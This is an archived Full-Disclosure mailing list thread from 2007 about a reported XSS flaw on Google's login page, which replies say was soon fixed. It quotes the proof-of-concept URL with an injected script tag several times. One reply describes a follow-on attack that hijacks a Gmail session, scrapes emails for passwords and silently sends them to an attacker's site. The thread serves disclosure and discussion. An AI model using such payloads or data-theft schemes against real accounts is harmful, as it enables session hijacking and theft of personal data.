Re: [Full-disclosure] Gmail 0day
Hello Juergen,
With all my respect, is it that hard to see that gaining access to a
Gmail session can lead to your identity being stolen?
Nowadays your webmail account means your online life/presence. Let's
have a walk through attack shall we?
1. Your Gmail session is hijacked (i.e.: via the XSS PoC posted on FD)
2. Attacker searches for password in 'Inbox'/'Sent Mail'.
- How many times have you clicked on Forgot password on MULTIPLE
online accounts and the password (whether a new pass or the original
one) emailed to you has not been changed from the time you got the
forgotten password email?
- How many users have emailed passwords to themselves so that they
don't forget?
- How many users use the same password on MULTIPLE online accounts
(including merchant/e-commerce accounts)?
- How many users have clicked on remember credit card details so
that they don't have to re-enter their CC data every time they perform
an online transaction?
- Did you forget to disable your Gtalk chat history (Gtalk is still
within the google.com domain)
- Have you saved anything personal on other services such as Google
docs/calendar/notebook? (or any other google.com service that doesn't
require you to re-login once authenticated)
3. For most victims, this leads to a compromise of his/her online identity.
If you fail to see the problem, then please think before you complain
about damn, right now 0day are fucking XSS
Posting a XSS PoC that opens an alert box doesn't have much merit
perhaps. However, this is the equivalent of saying: hey, I can cause
a BO condition. If you send X parameter with 500 bytes/chars or more,
then EIP is overwritten and the attacked service crashes. Now compare
that to actually compromising the server via the buffer overflow
vulnerability. That's a DIFFERENT STORY.
Same thing goes for any XSS. Now say, screw a cookie theft exploit for
the Gmail XSS! (pardon my French). Make something more clever!
Perhaps, you want a payload that scrapes all the victim's emails which
contain keywords such as 'password', 'private', 'admin', and so on.
Then, all the captured data is submitted to the attacker's site in the
background (nothing suspicious is visually happening from the victim's
point of view).
Sure Gmail has CSRF protection, but that can be bypassed via XSS.
After all, anti-CSRF tokens can be grabbed if URLs can be accessed
within the security context of the target domain (which is possible
via XSS).
If you consider all the aforementioned thoughts plus the fact that
Gmail is one of the most popular webmail services, then you should be
able to understand the power of a XSS vul on google.com !
Regards,
AP.
On Nov 8, 2007 8:55 PM, Juergen Marester [EMAIL PROTECTED] wrote:
wow ! 0day !
damn, right now 0day are fucking XSS ...
On 11/8/07, silky [EMAIL PROTECTED] wrote:
worked for me minutes after it was posted. seems fixed now.
On 11/9/07, crazy frog crazy frog [EMAIL PROTECTED] wrote:
i tested it on gmail latest version,itsnot working for me?
On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED] wrote:
There is a html injection vulnerability in https://www.google.com.
It is very critical,you can get the cookie to login into gmail ore
other
service.
POC:
https://www.google.com/accounts/ServiceLogin?service=mailrm=falsecontinue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dlltmpl=defaultltmplcache=2passive=truel#;/scriptscriptalert('xss')/script1-=1
More:http://xss2root.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
advertise on secgeeks?
http://secgeeks.com/Advertising_on_Secgeeks.com
http://newskicks.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
mike
http://lets.coozi.com.au/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
pagvac
gnucitizen.org, ikwt.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail 0day
On Fri, Nov 09, 2007 at 09:09:48AM +1100, silky wrote: news at 11: xss leads to ability to steal data. that headline doesn't have enough 'fauxnews' in it.. how about voice id='themoviefoneguythatwasalsoingeicocommercials'tonight at 11... is your personal data in the hands of hackers? don't miss our 42 part special report that uncovers the truth about your personal data on the internet/voice regards, jonez -- http://zoidtechnologies.com/ -- software that sucks less ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail 0day
this means a lot today :) if you haven't noticed! On Nov 8, 2007 10:00 PM, silky [EMAIL PROTECTED] wrote: On 11/9/07, pdp (architect) [EMAIL PROTECTED] wrote: well this XSS can lead to so much data being stolen that it is not even funny! orly? -- pdp (architect) | petko d. petkov http://www.gnucitizen.org ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail 0day
well this XSS can lead to so much data being stolen that it is not even
funny!
On Nov 8, 2007 8:55 PM, Juergen Marester [EMAIL PROTECTED] wrote:
wow ! 0day !
damn, right now 0day are fucking XSS ...
On 11/8/07, silky [EMAIL PROTECTED] wrote:
worked for me minutes after it was posted. seems fixed now.
On 11/9/07, crazy frog crazy frog [EMAIL PROTECTED] wrote:
i tested it on gmail latest version,itsnot working for me?
On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED] wrote:
There is a html injection vulnerability in https://www.google.com.
It is very critical,you can get the cookie to login into gmail ore
other
service.
POC:
https://www.google.com/accounts/ServiceLogin?service=mailrm=falsecontinue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dlltmpl=defaultltmplcache=2passive=truel#;/scriptscriptalert('xss')/script1-=1
More:http://xss2root.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
advertise on secgeeks?
http://secgeeks.com/Advertising_on_Secgeeks.com
http://newskicks.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
mike
http://lets.coozi.com.au/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
pdp (architect) | petko d. petkov
http://www.gnucitizen.org
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail 0day
wow ! 0day !
damn, right now 0day are fucking XSS ...
On 11/8/07, silky [EMAIL PROTECTED] wrote:
worked for me minutes after it was posted. seems fixed now.
On 11/9/07, crazy frog crazy frog [EMAIL PROTECTED] wrote:
i tested it on gmail latest version,itsnot working for me?
On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED] wrote:
There is a html injection vulnerability in https://www.google.com.
It is very critical,you can get the cookie to login into gmail ore
other
service.
POC:
https://www.google.com/accounts/ServiceLogin?service=mailrm=falsecontinue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dlltmpl=defaultltmplcache=2passive=truel#
/scriptscriptalert('xss')/script1-=1
More:http://xss2root.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
advertise on secgeeks?
http://secgeeks.com/Advertising_on_Secgeeks.com
http://newskicks.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
mike
http://lets.coozi.com.au/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail 0day
On 11/9/07, pdp (architect) [EMAIL PROTECTED] wrote: well this XSS can lead to so much data being stolen that it is not even funny! orly? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail 0day
worked for me minutes after it was posted. seems fixed now.
On 11/9/07, crazy frog crazy frog [EMAIL PROTECTED] wrote:
i tested it on gmail latest version,itsnot working for me?
On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED] wrote:
There is a html injection vulnerability in https://www.google.com.
It is very critical,you can get the cookie to login into gmail ore other
service.
POC:
https://www.google.com/accounts/ServiceLogin?service=mailrm=falsecontinue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dlltmpl=defaultltmplcache=2passive=truel#;/scriptscriptalert('xss')/script1-=1
More:http://xss2root.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
advertise on secgeeks?
http://secgeeks.com/Advertising_on_Secgeeks.com
http://newskicks.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
mike
http://lets.coozi.com.au/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail 0day
On 11/9/07, pdp (architect) [EMAIL PROTECTED] wrote: this means a lot today :) if you haven't noticed! of course i've noticed it's just pretty fucking obvious to absolutely everyone. i don't really see why you decided to point it out. news at 11: xss leads to ability to steal data. On Nov 8, 2007 10:00 PM, silky [EMAIL PROTECTED] wrote: On 11/9/07, pdp (architect) [EMAIL PROTECTED] wrote: well this XSS can lead to so much data being stolen that it is not even funny! orly? -- pdp (architect) | petko d. petkov http://www.gnucitizen.org -- mike http://lets.coozi.com.au/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Gmail 0day
This was listed as 'Fixed' at Xssed.com when released about 17 hours ago (or
maybe earlier).
Link (note: a mirror page generates JS pop-up etc.):
http://www.xssed.com/mirror/25472/
- Juha-Matti
silky [EMAIL PROTECTED] wrote:
worked for me minutes after it was posted. seems fixed now.
On 11/9/07, crazy frog crazy frog [EMAIL PROTECTED] wrote:
i tested it on gmail latest version,itsnot working for me?
On Nov 8, 2007 7:04 AM, Scripter Hack [EMAIL PROTECTED] wrote:
There is a html injection vulnerability in https://www.google.com.
It is very critical,you can get the cookie to login into gmail ore other
service.
POC:
https://www.google.com/accounts/ServiceLogin?service=mailrm=falsecontinue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dlltmpl=defaultltmplcache=2passive=truel#;/scriptscriptalert('xss')/script1-=1
More:http://xss2root.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
advertise on secgeeks?
http://secgeeks.com/Advertising_on_Secgeeks.com
http://newskicks.com
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
--
mike
http://lets.coozi.com.au/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Gmail 0day
There is a html injection vulnerability in https://www.google.com.
It is very critical,you can get the cookie to login into gmail ore other
service.
POC:
https://www.google.com/accounts/ServiceLogin?service=mailrm=falsecontinue=http%3A%2F%2Fmail.google.com%2Fmail%2F%3Fui%3Dhtml%26zy%3Dlltmpl=defaultltmplcache=2passive=truel#;/scriptscriptalert('xss')/script1-=1
More:http://xss2root.blogspot.com/
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
